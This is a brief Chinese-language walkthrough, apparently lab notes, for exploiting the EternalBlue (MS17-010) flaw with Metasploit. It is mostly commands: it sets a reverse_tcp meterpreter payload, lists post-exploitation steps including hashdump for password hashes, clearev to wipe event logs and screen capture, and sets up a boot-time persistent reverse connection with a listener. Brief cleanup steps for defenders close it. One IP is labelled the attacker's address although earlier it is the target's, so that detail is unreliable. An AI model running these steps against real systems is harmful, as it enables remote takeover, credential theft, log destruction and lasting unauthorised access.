永恒之蓝(ms17-010)
启动meterpreter
msfconsole
查询ms17-010,并使用攻击模块
search ms17-010
use 3
设置目标ip,本机ip,payload
set rhosts 192.168.254.130
set lhost 192.168.254.129
set payload windows/x64/meterpreter/reverse_tcp
查看配置
show options
开始攻击
run
meterpreter模块简单使用
pwd //打印当前工作目录
sysinfo //查看系统信息
getuid //获取当前权限的用户id
ps //查看当前目标机上运行的进程列表和pid
screenshot //截取目标主机当前屏幕
hashdump //获取用户名与hash口令
shell //获取目标主机shell
upload //上传一个文件
download //下载一个文件
execute //执行目标系统中的文件(-f指定文件,-i执行可交互模式,-H隐藏窗口)
clearev //清除日志
background //将meterpreter放入后台(使用sessions -i重新连接到会话)
run vnc //查看目标机的屏幕
run arp_scanner -r 192.168.254.0/24 //检测所在局域网中的存活主机
在meterpreter shell上通过以下命令建立持久性连接:
1. run persistence -X -i 50 -p 443 -r 192.168.254.130
-X:表示目标机开机自启动meterpreter
-i 50:表示目标机每隔50秒自动连接攻击机
-p 443:表示目标机将连接攻击机的443端口
-r 192.168.254.130:表示目标机将主动连接192.168.254.130(即攻击机地址)
2. exit
use multi/handler
set lhost 192.168.254.129
set lport 443
set payload windows/meterpreter/reverse_tcp
run
目标机为了防御meterpreter脚本的持久性连接,需要手动删除本机上残留的meterpreter脚本,删除方法为:
1.删除C:\Windows\TEMP\下的vbs文件,本例中为OHQvGWf.vbs
2.删除相应的注册表键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run